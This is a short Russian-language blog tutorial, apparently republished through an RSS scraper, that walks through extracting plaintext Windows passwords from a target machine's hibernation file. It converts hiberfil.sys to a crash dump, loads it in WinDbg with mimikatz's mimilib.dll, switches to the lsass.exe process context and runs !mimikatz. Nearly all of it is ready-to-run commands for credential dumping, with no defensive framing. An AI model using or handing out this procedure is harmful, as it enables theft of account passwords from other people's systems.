Подготовка
Для осуществления задуманного нам понадобятся следующие утилиты:
Действия
1. Получаем файл hiberfil.sys с целевой машины.
2. Конвертируем файл в формат понятный WinDbg.
hibr2dmp.exe d:\temp\hiberfil.sys c:\temp\hiberfil.dmp
Процесс может занять довольно продолжительное время
3. Запускаем WinDbg и открываем полученный файл.
File -> Open Crash Dump
4. Настраиваем отладочные символы.
Открываем File -> Symbol File Path… и вписываем следующую строчку:
SRV*c:\symbols*http://ift.tt/1dF6hHm
Вместо c:\symbols, естественно, может быть любой каталог, в который будут загружены символы
В командной строке дебаггера пишем:
0: kd> .reload /n
Ждём окончания загрузки символов:
5. Указываем путь к библиотеке mimilib.dll (находится в каталоге с mimikatz).
0: kd> .load z:\Soft\Security\Passwords\Mimikatz\x64\mimilib.dll
6. Находим адрес процесса lsass.exe.
0: kd> !process 0 0 lsass.exe
В данном случае адрес: fffffa800a7d9060.
7. Переключаем контекст процесса.
0: kd> .process /r /p fffffa800a7d9060
8. Запускаем mimikatz и получаем пароли в открытом виде.
0:kd> !mimikatz
Ссылки по теме
Раскрытие учетных данных в Microsoft Windows: http://ift.tt/1LeavX9
LSA Authentication: http://ift.tt/1vXItvU
What is Digest Authentication: http://ift.tt/1vXIvDZ
Recommended article: Chomsky: We Are All – Fill in the Blank.
This entry passed through the Full-Text RSS service - if this is your content and you're reading it on someone else's site, please read the FAQ at http://ift.tt/jcXqJW.
Комментариев нет:
Отправить комментарий